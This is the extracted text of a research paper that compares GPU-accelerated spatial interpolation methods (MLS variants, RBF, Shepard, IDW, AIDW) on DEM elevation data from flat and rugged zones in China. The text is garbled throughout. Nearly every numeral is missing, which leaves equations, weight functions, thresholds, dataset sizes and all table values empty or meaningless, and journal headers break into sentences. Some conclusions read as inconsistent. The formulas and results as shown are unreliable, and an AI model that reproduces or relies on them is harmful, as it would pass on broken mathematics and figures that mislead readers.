at each point x̄, aj(x̄) is chosen to minimize the weighted residual l − norm (l − norm refers to ‖x‖ , where x =[x ,x ,...,xn] t , and ‖x‖ = √( |x | +|x | +|x | +···+|xn| ) ): j = n∑ i= w(x̄−xi) [ pt (xi)a(x̄)−fi ] ( ) where n is the number of nodes in the compact-supported neighborhood of x̄ and fi refers to the nodal parameter of f at x =xi . nodes refer to data points in the compact-supported neighborhood of x̄. compact-supported, i.e., point x̄ is only related to the nodes of its neighborhood, xi is one of the nodes in the compact-supported neighborhood. and w(x−xk) is the compact-supported weight function. the most commonly used weight functions are the spline functions, for example, the cubic spline weight function (eq. ( )): w(s̄)=   − s̄ + s̄ , − s̄+ s̄ − s̄ , , s̄≤ < s̄≤ s̄> ( ) where s̄= ssmax and s= x̄−xi . the minimum of j with respect to a(x̄) gives the standard form of mls approximation: f h(x)= n∑ i= φi (x)fi = (x)f. ( ) orthogonal mls interpolation algorithm for a given polynomial basis function pi(x), i= , ,···,m, there is an orthonormal basis function qi(x,x̄) that satisfies: q (x,x̄)=p (x) qi(x,x̄)=pi(x)− i− ∑ j= αij(x,x̄)qj(x,x̄),i= , ,···,m ( ) where αij(x,x̄) is the coefficient that makes qi(x,x̄) perpendicular to qj(x,x̄). αij(x̄)= ∑n k= wk(x̄)pi(xk)qj(xk,x̄)∑n k= wk(x̄)q j (xk,x̄) ( ) tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. because the coefficient matrix is a diagonal matrix, the solution for ai(x) does not require matrix inversion, i.e., ai(x̄)= ∑n k= wk(x̄)qi(xk,x̄)fk∑n k= wk(x̄)q i (xk,x̄) ( ) where ai and aj(x̄) (eq. ( )) have the same definition. fk and fi (eq. ( )) have the same definition, i.e., the nodal parameter of f at x =xk. finally, ai and the orthonormal basis function qi(x,x̄) are fitted into eq. ( ) to obtain the orthogonal mls approximation f h(x). when the number or order of basis functions increases, only am+ and αm+ need to be calculated in gram–schmidt orthogonalization (steve, ); recalculation of all entries in the coefficient matrix is not needed. this could reduce the computational cost and the computational error. lancaster’s mls interpolation algorithm a singular weight function is adopted to make the approximation function f h(x) constructed by the interpolation type mls method satisfy the properties of the kronecker δ function: ω(x,xk)= { ‖(x−xk)/ρk‖ -α , , ‖x−xk‖≤ρk ‖x−xk‖>ρk ( ) let p (x)≡ ,p (x),...,pm̄(x) denote the basis function used to construct the approximation function, where the number of basis functions is m̄+ . to implement the interpolation properties, a new set of basis functions is constructed for a given basis function. first, p (x) are standardized, i.e., p̃ (x,x̄)= [∑n k= ω(x,xk) ] / ( ) then, we construct a new basis function of the following form: p̃i(x,x̄)=pi(x̄)− n∑ k= ω(x,xk)∑n l= ω(x,xl) pi(xk),i= , ,...,m̄. ( ) rbf-based interpolation algorithm the rbf operates as a spline, essentially fitting a series of piecewise surfaces to approximate a complex terrain. let x ={x ,x ,...,xn} be a set of pairwise distinct points in a domain �⊆rd with associated data values fi, i= , ,...,n . we consider the problem of construction a d-variety function f ∈ck ( rd ) that interpolates the known data. specifically, we require f(xi)= fi, i= , ,...,n . if we take f in the form. f(x)= n∑ j= wjϕ (∥∥xi−xj∥∥ ) ( ) tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
where ϕ : [ ,∞]→r is a suitable continuous function, the interpolation conditions become: n∑ j= wjϕ (∥∥xi−xj∥∥ )= fi, i= , ,...,n. ( ) shepard’s interpolation algorithms shepard ( ) proposed a series of interpolation algorithms on the basis of weighting averages. these algorithms are termed shepard’s method. the essential idea behind shepard’s method is to estimate expected values of the interpolation point by weighting averages of the nearby discrete points as follows: let ( xi,yi ) , i= , ,...,n be the interpolation point and fi be the corresponding value at interpolation point ( xi,yi ) . the expected value f at any point can be expressed as f (x)= n∑ i= wi(x)fi∑n j= wj(x) ( ) where w(x) is a weight function. the differences between the different variants of shepard’s method are in the selection of different weighting functions. in this subsection, four common variants of shepard’s method will be briefly introduced (eqs. ( )–( )). variant a of shepard’s interpolation algorithm first, select the influence radius r> and let the weight function be w(r)=   r , ( r r − ) , , <r ≤ r r <r ≤r r >r ( ) then, a variation of shepard’s interpolation will be obtained. variant b of shepard’s interpolation algorithm when employing the following weight function (eq. ( )), a new variation of shepard’s interpolation will be obtained. w(s̄)=   − s̄ + s̄ , − s̄+ s̄ − s̄ , , s̄≤ < s̄≤ s̄> ( ) inverse distance weighted (idw) interpolation algorithm if the weight function is selected as wi(x)= d(x,xi) α ( ) the idw interpolation is obtained. typically, α= in the standard idw. where d(x,xi) is the distance between the interpolation point xi and the nearby discrete point x. tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. aidw interpolation algorithm the adaptive inverse distance weighted (aidw) is an improved version of the standard idw (shepard, ) originated by lu & wong ( ). the distance-decay parameter α is no longer a prespecified constant value but is adaptively adjusted for a specific unknown interpolated point according to the distribution of the nearest neighboring data points. the parameter α is taken as α(µr)=   α , α [ − (µr− . )]+ α (µr− . ), α (µr− . )+α [ − (µr− . )], α [ − (µr− . )]+ α (µr− . ), α (µr− . )+α [ − (µr− . )], α , . ≤µr≤ . . ≤µr≤ . . ≤µr≤ . . ≤µr≤ . . ≤µr≤ . . ≤µr≤ . ( ) µr=   , . − . cos[π(r(s )−rmin)/rmax], , r(s )≤rmin rmin≤r(s )≤rmax r(s )≥rmax ( ) where the α , α , α , α , α are the to-be-assigned five levels or categories of distance decay value. rmin or rmax refer to a local nearest neighbor statistic value, and rmin and rmax can generally be set to . and . , respectively. then, r(s )= √ n/a k k∑ i= di ( ) where n is the number of points in the study area, a is the area of the study region, k is the number of nearest neighbor points, di is the nearest neighbor distances and s is the location of an interpolated point. methods implementations of the spatial interpolation algorithms we have implemented the spatial interpolation algorithms of rbf (ding et al., b), mls (ding et al., a), idw (mei, ), and aidw (mei, xu & xu, ) in our previous work. to evaluate the computational performance of the gpu-accelerated interpolation, we implement and compare ( ) the sequential implementation, ( ) the parallel implementation developed on a multicore cpu, ( ) the parallel implementation using a single gpu, and ( ) the parallel implementation using multiple gpus. 
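to make the standard idw estimator described in 'background' concrete, the following minimal serial sketch predicts the value at a single interpolation point from nearby data points; it is our reference illustration with a toy data set and the power parameter assumed to be α = 2, not the parallel gpu code evaluated in this paper:

# Illustrative serial IDW estimate at one interpolation point (toy data only).
import numpy as np

def idw_predict(query_xy, data_xy, data_z, alpha=2.0):
    d = np.linalg.norm(data_xy - query_xy, axis=1)   # distances to data points
    if np.any(d == 0.0):                             # query coincides with a data point
        return data_z[np.argmin(d)]
    w = 1.0 / d ** alpha                             # weight = 1 / distance^alpha
    return np.sum(w * data_z) / np.sum(w)

data_xy = np.array([[0.0, 1.0], [1.0, 0.0], [-1.0, 0.0], [0.0, -1.0]])
data_z = np.array([10.0, 12.0, 11.0, 9.0])           # elevations at the data points
print(idw_predict(np.array([0.2, 0.1]), data_xy, data_z))

in the presented parallel implementations, the same kind of estimate is evaluated for each interpolation point, but only over a local set of nearby data points found by a knn search, as described in 'methods'.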
there are two key ideas behind the presented spatial interpolation algorithm: ( ) we use an efficient k-nearest neighbor (knn) search algorithm (mei, xu & xu, ) to find the local set of data points for each interpolated point. ( ) we employ the local set of data points to compute the prediction value of the interpolated point using different interpolation methods. mei & tian ( ) evaluated the impact of different data layouts on the computational efficiency of the gpu-accelerated idw interpolation algorithm. they implemented three tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. idw versions of gpu implementations, based upon five data layouts, including the structure of arrays (soa), the array of structures (aos), the array of aligned structures (aoas), the structure of arrays of aligned structures (soaos), and a hybrid layout, then they carried out several groups of experiments to evaluate the impact of different data layouts on the interpolation efficiency. based on their experimental results, the layout soa is shown in listing . struct pt { float x[n]; float y[n]; float z[n]; }; struct pt mypts; listing : the layout soa the knn (cover & hart, ) is a machine learning algorithm often used in classification, the k-nearest neighbor means that each data point can be represented by its k nearest neighbor points. in all of the presented interpolation algorithms, for each interpolation point, a local set of data points is found by employing the knn search procedure and the found local sets of data points are then used to calculate the prediction value of the interpolation point. for large size of dem, the knn search algorithm can effectively improve the speed of interpolation by searching only the points near the interpolation points (mei, xu & xu, ). assuming there are m interpolated points and n data points, the process of the knn search algorithm is as follows: step : the k distances between the k data points and each of the interpolated points are calculated; for example, if the k is set to , then there are distances needed to be calculated; see the row (a) in fig. . step : the k distances are sorted in ascending order; see the row (b) in fig. . step : for each of the rest (m-k) data points, ( ) the distance d is calculated, for example, the distance is . (d = . ); ( ) the d with the kth distance are compared: if d < the kth distance, then replace the kth distance with the d (see row (c)); ( ) iteratively compare and swap the neighboring two distances from the kth distance to the st distance until all the k distances are newly sorted in ascending order; see the rows (c)–(e) in fig. . creation of the testing data two sets of dem data were downloaded from the geospatial data cloud (http: //www.gscloud.cn//). more specifically, two -m resolution dems for two km × km regions in hebei and sichuan provinces were selected. the topography of hebei province is mainly plain, while the topography of sichuan province is mainly mountainous. two sets of dem data are derived from remote sensing satellites and compiled by the cnic tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.gscloud.cn/ http://www.gscloud.cn/ http://dx.doi.org/ . /peerj-cs. figure an illustration of the process of the knn search algorithm. full-size doi: . /peerjcs. /fig- (computer network information center, chinese academy of sciences). more details on the selected dems are presented in fig. . 
data points and interpolated points (listed in tables and ) are produced as follows: ( ) the selected dems is imported into the software arcgis. ( ) a square region s is delimited in selected dems. for example, the two km × km regions shown in fig. . ( ) generating the x and y coordinates of randomly determined points by random number generation algorithms in the square region s, and then accessing the corresponding z coordinates from the dem (the randomly determined points are the data points p ). evenly distributed (regularly distributed) data points are randomly extracted using the linear congruential random number method (lehmer, ), and normally distribution (irregularly distributed, mathematical expectation µ= , , standard deviation σ = , ) data points are randomly extracted using the box–muller method (box & muller, ). for example, we set size , the extracted regularly distributed data points p = , (table ), and density is p /s (s is the area of s, and s is a fixed value, where s = km × km). ( ) the square region s is triangulated into a planar triangular mesh using the del auney algorithm (watson, ), the mesh nodes are considered to be the interpolation points, with known x and y coordinates and unknown z coordinates, the unknown z coordinates is the estimated value to be obtained by interpolation. according to the randomly sampled points obtained in step , we use the interpolation method mentioned in ‘background’ to interpolate. then, the corresponding exact elevation of the interpolation point is obtained by accessing the z value of the dem at the associated x and y coordinates. finally, the z values at the mesh points are used as control for testing the accuracy of the interpolated z values. to quantitatively determine regular and irregular point sampling, average nearest neighbor analysis (ebdon, ) is applied. in the proposed method, nearest neighbor ratio (nnr) is used to evaluate the distribution pattern of sample points: if the nnr > , the distribution pattern shows clustered; if the nnr < , the distribution pattern shows tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the selected zone and zone . (a) . d model of the zone study area and (b) . d model of the zone study area. full-size doi: . /peerjcs. /fig- dispersed. as listed in table , the nnr of regularly-distributed, approximately . , is greater than , the distribution pattern is dispersed (fig. a), that is regularly-distributed; the nnr of irregularly-distributed, approximately . , is less than , the distribution pattern is clustered (fig. b), that is irregularly-distributed. zone (flat zone) the first selected region is located in hengshui city, hebei province. the dem of this region has the identifier astgtm_n e and is derived from the geospatial data cloud (http://www.gscloud.cn/). the location and elevation of this region is illustrated in fig. . in the region, the highest elevation is m and the lowest is m. we translated the tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://www.gscloud.cn/ http://dx.doi.org/ . /peerj-cs. table ten used groups of experimental testing data in the flat zone. 
data set number of data points number of interpolated points size , , size , , size , , , size , , , , regularly- distributed size , , , , size , , size , , size , , , size , , , , irregularly- distributed size , , , , table ten used groups of experimental testing data in the rugged zone. data set number of data points number of interpolated points size , , size , , size , , , size , , , , regularly- distributed size , , , , size , , size , , size , , , size , , , irregularly- distributed size , , , , table the nnr of regular and irregular point sampling. data set flat zone rugged zone size . . size . . size . . size . . regularly- distributed size . . size . . size . . size . . size . . irregularly- distributed size . . tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. significant significant(random) clustered random dispersed significance level (p-value) critical value (z-score) . . . --- . . . <- . - . -- . - . -- . - . - . . - . . - . > . significant significant(random) clustered random dispersed significance level (p-value) critical value (z-score) . . . --- . . . <- . - . -- . - . -- . - . - . . - . . - . > . a b figure the distribution patterns determined by the average nearest neighbor analysis. (a) regu- larly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- x coordinate by , and the y coordinate by , , to obtain a km × km square area centered on the origin. five sets of benchmark test data were generated in this region; see table . zone (rugged zone) the second selected region is located in ganzi tibetan autonomous prefecture, sichuan province. the dem of this region has the identifier astgtm_n e and is derived from the geospatial data cloud (http://www.gscloud.cn/). the location and elevation of this region is illustrated in fig. . in the region, the highest elevation is , m and the lowest is , m. we translated the x coordinate by , and the y coordinate by , , to obtain a km × km square area centered on the origin. five sets of benchmark test data are generated in this region; see table . criteria for comparison in this paper, we evaluate the interpolation algorithms described in ‘background’ by: ( ) comparing the interpolation accuracy and efficiency when the terrain is gentle and rugged, and ( ) comparing the interpolation accuracy and efficiency when data points are evenly distributed and nonuniformly distributed. the accuracy of each interpolation method is analyzed by comparing the elevation values predicted by the interpolation algorithms with the real dem elevation value. the efficiency of each interpolation method is compared by benchmarking the running time of tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://www.gscloud.cn/ http://dx.doi.org/ . /peerj-cs. table specifications of the workstation and the software used for the experimental tests. specifications details cpu intel xeon e - v cpu frequency . ghz cpu ram gb cpu core gpu quadro m gpu memory gb gpu core os windows professional compiler visual studio cuda version v . different implementations developed in sequence, on a multicore cpu, on a single gpu, and on multiple gpus. results experimental environment to evaluate the computational performance of the presented various parallel interpolations, we conducted ten groups of experimental tests in both the flat zone and the rugged zone on a powerful workstation equipped with two quadro m gpus. 
the specifications of the workstations are listed in table . test results of interpolation accuracy for different interpolation algorithms in this paper, we adopt the normalized root-mean-square-error (nrmse) as the metric to measure the interpolation accuracy of the different interpolation algorithms. the nrmse is defined in eq. ( ). normalized root-mean-square-error (nrmse): nrmse = max ≤i≤ni ∣∣fa∣∣ √√√√ ni ni∑ i= ∣∣fn−fa∣∣ ( ) where ni is the number of interpolated points, fa is the theoretically exact solution of the ith interpolated point (the elevation of the dem at this point), and fn is the predicted value of the ith interpolated point. the interpolation accuracy of the ten groups of experimental tests is listed in table . the numerical value shown in table is nrmse, which means that the smaller the numerical value, the higher the interpolation accuracy. as listed in table , the most accurate interpolation algorithm is the mls interpolation algorithm. for the small size (size ), compared with other two algorithms, the mls algorithm is . %– . % more accurate than the rbf algorithm, and it is . %– . % more accurate than the shepard’s algorithm. on the other hand, for the same algorithm, when the distribution pattern is the same, its accuracy in the flat area is higher than that tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table interpolation accuracy of the parallel interpolation algorithms implemented on a single gpu. data set original mls orthogonal mls lancaster’s mls knn rbf knn aidw knn idw knn shepard knn shepard size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− regularly dis- tributed size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− flat zone irregularly- distributed size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− regularly- distributed size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− rugged zone irregularly- distributed size . e− . e− . e− . e− . e− . e− . e− . e− the rugged area. for example, for the mls algorithm, when the distribution pattern is nonuniformly distributed, the accuracy of the lancaster’ mls algorithm in the flat area is approximately % higher than that of the lancaster’ mls algorithm in the rugged area. as shown in figs. and , the nrmses of various interpolation methods for the regularly distributed are less than % of the nrmses of various interpolation methods for the irregularly distributed. the above behavior becomes even more obvious in the rugged zone than in the flat zone. thus, the regular distribution provides a more accurate solution for both the rugged and the flat areas. test results of computational efficiency for different interpolation algorithms in our experimental tests, the value of k is . those twenty groups of experimental tests were performed on the workstations mentioned above. 
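for reference, the following is a minimal numpy sketch of the accuracy and efficiency metrics used in this and the next subsection; it assumes the usual form of the nrmse (the root-mean-square error divided by the maximum absolute exact value), and the function names are ours.

import numpy as np

def nrmse(f_pred, f_exact):
    """normalized root-mean-square error over all interpolated points,
    assuming rmse scaled by the largest absolute exact elevation."""
    f_pred = np.asarray(f_pred, dtype=float)
    f_exact = np.asarray(f_exact, dtype=float)
    rmse = np.sqrt(np.mean((f_pred - f_exact) ** 2))
    return rmse / np.max(np.abs(f_exact))

def speedup(t_seq, t_par):
    """speedup of a parallel implementation relative to the sequential one."""
    return t_seq / t_par

listing (sketch): the nrmse and speedup metrics. a smaller nrmse means higher interpolation accuracy, which is how the values reported in the accuracy tables are read.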
the running times and corresponding speedups of each group of experimental tests are presented in the following section. the speedup is defined in eq. ( ): speedup = tseq / tpar, where tseq is the running time of the sequential implementation and tpar is the running time of the parallel implementation. figure interpolation accuracy of gpu-accelerated interpolation algorithms in the flat zone. (a) regularly distributed and (b) irregularly distributed. figure interpolation accuracy of gpu-accelerated interpolation algorithms in the rugged zone. (a) regularly distributed and (b) irregularly distributed. computational efficiency of sequential implementations as listed in table , for the sequential version, when given the same sets of data points and interpolation points, the order of computational time from fastest to slowest is: shepard's interpolation method, the mls interpolation, and the rbf interpolation. the computational time of shepard's interpolation method is approximately % less than that of the mls interpolation method, and approximately % less than that of the rbf interpolation method. computational efficiency of parallel implementations as shown in figs. – , the parallel version developed on multi-gpus has the highest speedup among the three parallel versions. except for the rbf interpolation method, the maximum speedups of the other interpolation algorithms are greater than . table running time (ms) of sequential implementations, with one column per algorithm (original mls, orthogonal mls, lancaster's mls, knn rbf, knn aidw, knn idw, and two knn shepard variants) and rows for the size – data sets, regularly and irregularly distributed, in the flat and rugged zones. figure comparison of the speedups of the parallel implementations developed on a multicore cpu in the flat zone. (a) regularly distributed and (b) irregularly distributed. figure comparison of the speedups of the parallel implementations developed on a multicore cpu in the rugged zone. (a) regularly distributed and (b) irregularly distributed. figure comparison of the speedups of the parallel implementations developed on a single gpu in the flat zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs.
/fig- as shown in figs. and , for the parallel version developed on multi-gpus, the order of the computational time from fastest to slowest is: the shepard’s interpolation, the mls interpolation, the rbf interpolation method. the computational time of shepard’s interpolation method is %– % less than the computational time of the mls interpolation method, and it is %– % less than the computational time of the rbf interpolation method. tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison of the speedups of the parallel implementations developed on a single gpu in the rugged zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- figure comparison of the speedups of the parallel implementations developed on multi-gpus in the flat zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- discussion the interpolation accuracy and computational efficiency are two critical issues that should be considered first in any interpolation algorithms. the interpolation accuracy should first be satisfied; otherwise, numerical analysis results would be inaccurate. in addition, the computational efficiency should be practical. more specifically, in the subsequent section we will analyze ( ) the interpolation accuracy of the presented eight gpu-accelerated interpolation algorithms with different data sets and ( ) the computational efficiency of the presented eight interpolation algorithms. tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison of the speedups of the parallel implementations developed on multi-gpus in the rugged zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- figure comparison of the running time of the parallel implementations developed on multi-gpus in the flat zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- comparison of interpolation accuracy to better compare the accuracy of the described interpolation algorithms, in the case of the highest sample density (size ) and the lowest sample density (size ), we listed those algorithms with the highest accuracy (i.e., the minimum nrmse) in table . as listed in table , for lower sample density (size ), the original mls algorithm has the best interpolation performance in regularly distributed. however, for higher sample density (size ), in general, the improved mls algorithm lancaster’s mls has higher interpolation accuracy than the original mls. in particular, the original mls has best accuracy in the rugged zone with irregularly distributed interpolation points. on the other hand, for shepard’s interpolation algorithms, the knnaidw is an improved version of the idw, which can adaptively determine the power parameter tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison of the running time of the parallel implementations developed on multi-gpus in the rugged zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- table the algorithm with the highest accuracy in congeneric algorithms and its corresponding nrmse. 
data set mls algorithm rbf algorithm shepard’s interpolation algorithm regularly- distributed size original mls ( . e– ) knnrbf ( . e– ) knnshepard ( . e– ) flat zone size lancaster’s mls ( . e– ) knnrbf ( . e– ) knnaidw ( . e– ) irregularly distributed size lancaster’s mls ( . e– ) knnrbf ( . e– ) knnaidw ( . e– ) size lancaster’s mls ( . e– ) knnrbf ( . e– ) knnaidw ( . e– ) regularly- distributed size original mls ( . e– ) knnrbf ( . e– ) knnaidw ( . e– )rugged zone size lancaster’s mls ( . e– ) knnrbf ( . e– ) knnidw ( . e– ) irregularly- distributed size lancaster’s mls ( . e– ) knnrbf ( . e– ) knnaidw ( . e– ) size original mls ( . e– ) knnrbf ( . e– ) knnaidw ( . e– ) according to the spatial points’ distribution pattern. therefore, in shepard’s interpolation algorithms, the knnaidw has higher accuracy in most situations. although under some specific conditions, the knnshepard and knnidw have higher accuracy than knnaidw, the accuracy of knnaidw is quite similar to them. as listed table . for the same flat zone, when the data points are uniformly distributed, the order of the interpolation accuracy from high to low is: the mls interpolation algorithm, rbf, and shepard’s interpolation method; when the data points are normal distribution, the order of the interpolation accuracy from high to low is: the mls interpolation algorithm, shepard’s interpolation method, and rbf. for the same rugged zone, regardless of the tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure frequency distribution of the relative error for the parallel implementation developed on a single gpu in the flat zone. (a) regularly distributed and (b) irregularly distributed. the size of data points: size . full-size doi: . /peerjcs. /fig- density and distribution of the data points, the interpolation accuracy order from high to low is: the mls interpolation algorithm, rbf, and shepard’s interpolation method. to further verify the above conclusions obtained from nrmse, we investigated the relative error of the interpolated results for the same set of data points and interpolation points (i.e., size ). the algorithm with the highest accuracy (i.e., the minimum nrmse) is used to represent the kind of algorithm. as shown in figs. and , the y axis is the lgn (n is the count of relative error), and the x axis is the relative error e. the e is defined in eq. ( ). ei= ∣∣∣∣fn−fafa ∣∣∣∣× % ( ) where fa is the theoretically exact solution of the ith interpolated point (the elevation of the dem at this point), fn is the predicted value of the ith interpolated point, and ei is the relative error of the ith interpolated point. as listed in tables and . for better evaluation of relative error, we also calculated the mean relative error e. the e is defined in eq. ( ) e = ∑ni i= ei ni ( ) where ni is the number of interpolated points. in the flat zone as shown in fig. , for the flat region, when the data points are evenly distributed, the frequency statistical curve of the mls is the highest when it is close to zero, the lowest when it is far away from zero, and the relative error distribution range is smaller, which means that the error of mls method is small. the characteristics of the frequency statistical curve of shepard’s method are completely opposite to those of mls, which means that the tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. 
figure frequency distribution of the relative error for the parallel implementation developed on a single gpu in the rugged zone. (a) regularly distributed and (b) irregularly distributed. the size of data points: size . full-size doi: . /peerjcs. /fig- table the algorithm with the highest accuracy in congeneric algorithms and its corresponding mean relative error in the flat zone. distribution mean relative error e (%) original mls knnrbf knnshepard bregularly- distributed . . . lancaster’s mls knnrbf knnaidwirregularly- distributed . . . table the algorithm with the highest accuracy in congeneric algorithms and its corresponding mean relative error in the rugged zone. distribution mean relative error e (%) original mls knnrbf knnaidwregularly- distributed . . . lancaster’s mls knnrbf knnaidwirregularly- distributed . . . error of mls method is large. for the rbf interpolation algorithm, the characteristic of the frequency statistics curve is a transitional phase between those for the mls and those for shepard’s method. the above curve features and e (table ) illustrate that the interpolation accuracy is from high to low in this condition: the mls interpolation algorithm, rbf, and shepard’s interpolation method. when the data points are normally distributed, the relative error distribution ranges of all the interpolation methods are larger than that for the uniformly distributed data points. as shown in fig. , the characteristics of the frequency statistics curve of rbf are obvious, the frequency statistical curve of rbf is above the frequency statistical curves of mls and tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. shepard’s method, which means that the error of rbf method is larger. the characteristics of frequency statistical curves of mls and shepard’s method are very similar, and the relative error distribution range of mls is the largest. as listed in table , in the flat zone, the accuracy of mls is slightly higher than shepard’s method when the data points are normally distributed. in the rugged zone as shown in fig. , for the rugged region, regardless of whether the data points are uniformly distributed or normally distributed, the characteristics of frequency statistical curves of mls, rbf and shepard’s method are similar to those illustrated in fig. . however, in fig. b, it is a little different in that most of the frequency statistical curve of shepard’s method is higher than the rbf’s. as listed in table , the interpolation accuracy is from high to low: the mls interpolation algorithm, rbf, and shepard’s interpolation method. according to the above figures and tables, some summary conclusions are obtained as follows: for the same region, when the density of data points is almost the same, the interpolation accuracy when the data points are evenly distributed is higher than the interpolation accuracy when the data points are nonuniformly distributed. as listed in tables and , when the data points are evenly distributed, the gap of the accuracy between the three variations of the mls method, rbf, and shepard’s interpolation methods increases with the decrease of point density. as shown in figs. and , when the data points are nonuniformly distributed, the maximum relative errors of mls is larger than other algorithms’, however, mls method has lower nrmse and e. a small number of larger relative errors has little effect on the overall interpolation accuracy. 
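the per-point relative error e_i and the mean relative error e discussed here can be written as a short numpy sketch following the definitions above; the function names are ours.

import numpy as np

def relative_error(f_pred, f_exact):
    """per-point relative error e_i in percent: |f_n - f_a| / |f_a| * 100."""
    f_pred = np.asarray(f_pred, dtype=float)
    f_exact = np.asarray(f_exact, dtype=float)
    return np.abs((f_pred - f_exact) / f_exact) * 100.0

def mean_relative_error(f_pred, f_exact):
    """mean relative error over all interpolated points."""
    return relative_error(f_pred, f_exact).mean()

listing (sketch): relative error and mean relative error. the frequency curves in the figures above are then simply histograms of the e_i values with a log-scaled count axis.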
a large number of small and medium relative errors are the key to determine the interpolation accuracy of the algorithm. as listed in table , compared with the uniform distribution, when the points are nonuniformly distributed the difference in the accuracy of the interpolation algorithms is not as sensitive to the changes of point density. compared with the three variations of the mls method and the rbf method, shepard’s interpolation method is quite suitable for cases where the data points have a smooth trend. when interpolating for the data points with an undulating trend, the accuracy of shepard’s interpolation method will be poor. when the density of data points is small, this rule becomes more obvious. comparison of computational efficiency the parallel implementations developed on multi-gpus is the most efficient, therefore, the parallel implementations developed on multi-gpus are discussed below. in the flat zone as illustrated in fig. , for the flat region, except for the knnrbf, when the number of data points is not much different, the nonuniformly distributed data point set requires tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of the running time cost in the knn search procedure. (a) sequential version on single cpu and (b) parallel version on single gpu. full-size doi: . /peerjcs. /fig- significantly more interpolation time than the uniformly distributed data point set, and with the increase of the number of points, interpolation time does increase as well. as illustrated in fig. , the speedups achieved by the rbf interpolation method is generally small, and its speedups are not much different in various cases. however, when the size of data point set is size and the data point set is nonuniformly distributed, the speedup of the rbf interpolation method is larger than other methods, which means that the benefits of parallelism are lower in this case. as indicated above, the distribution pattern of data points strongly influences the interpolation efficiency. in the rugged zone as illustrated in figs. and , the running time and the speedups in the rugged region are almost the same as those in the flat region. in other words, the characteristics of the terrain elevation of data points have a weak influence on computational efficiency. influence of knn search on computational efficiency according to ‘methods’ , in the interpolation procedure, the knn search may affect the entire computational efficiency of interpolation. to specifically evaluate the influence of the knn search on the computational efficiency of the entire interpolation procedure, we investigated the computational cost of the knn search for relatively large numbers of data points, i.e., for the dataset of size (listed in fig. ). note that we employ four sets of data points with size , including ( ) the set of uniformly distributed data points and the set of nonuniformly distributed data points in the flat region and ( ) the set of uniformly distributed data points and the set of nonuniformly distributed data points in the rugged region. as listed in table , for the sequential version, regardless of whether the data points are uniformly distributed or nonuniformly distributed, the knn search costs approximately tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table proportion of the knn search time to the running time of the sequential implementations. 
